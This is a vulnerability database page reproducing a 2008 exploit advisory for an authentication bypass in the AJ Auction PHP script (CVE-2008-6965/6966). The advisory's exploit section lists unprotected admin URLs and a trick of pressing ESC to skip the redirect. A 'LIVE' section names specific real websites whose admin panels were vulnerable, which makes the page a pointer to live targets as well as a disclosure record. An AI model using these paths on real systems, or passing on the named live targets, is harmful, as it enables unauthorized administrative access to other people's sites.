Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
AJ Auction Authentication Bypass Vulnerability
2009.08.15
Credit:
G4N0K
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-6965
|
CVE-2008-6966
CWE:
CWE-287
============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== AJ Auction Auth Bypass Vulnerability ============================================================================== [»] Script: [ AJ Auction ] [»] Language: [ PHP ] [»] Website: [ http://www.ajsquare.com/products/auction/ ] [»] Type: [ Commercial ] [»] Report-Date: [ 10.11.2008 ] [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] [-] AJ Auction OOPD [+] AJ Auction Pro Platinum Skin #1 [+] AJ Auction Pro Platinum Skin #2 [+] AJ Auction Web 2.0 ===[ XPL ]=== [!] When the page gets load, Press ESC btn To Bypass Redirection ;) [ Only AJ Auction Pro Platinum Skin #1 ] [»] http://localhost/[path]/admin/user.php [ all ] [»] http://localhost/[path]/admin/site.php [»] http://localhost/[path]/admin/auction.php [»] http://localhost/[path]/admin/mail.php [»] http://localhost/[path]/admin/fee_setting.php [»] http://localhost/[path]/admin/earnings.php [»] http://localhost/[path]/admin/insertion_fee_settings.php [»] http://localhost/[path]/admin/custom_category.php [»] http://localhost/[path]/admin/subcategory.php [»] http://localhost/[path]/admin/category.php [»] http://localhost/[path]/admin/report.php [»] http://localhost/[path]/amdin/store_manager.php [»] http://localhost/[path]/admin/choose_sell_format.php [»] ... ===[ LIVE ]=== [!] Skin #1 [»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php [»] http://www.tapinglobal.com/admin/ [!] Web2.0 [»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 <Tornado2800[at]gmail.com> [»] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); ===============================================================================
Referencje:
http://xforce.iss.net/xforce/xfdb/46528
http://www.securityfocus.com/bid/32243
http://www.milw0rm.com/exploits/7087
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top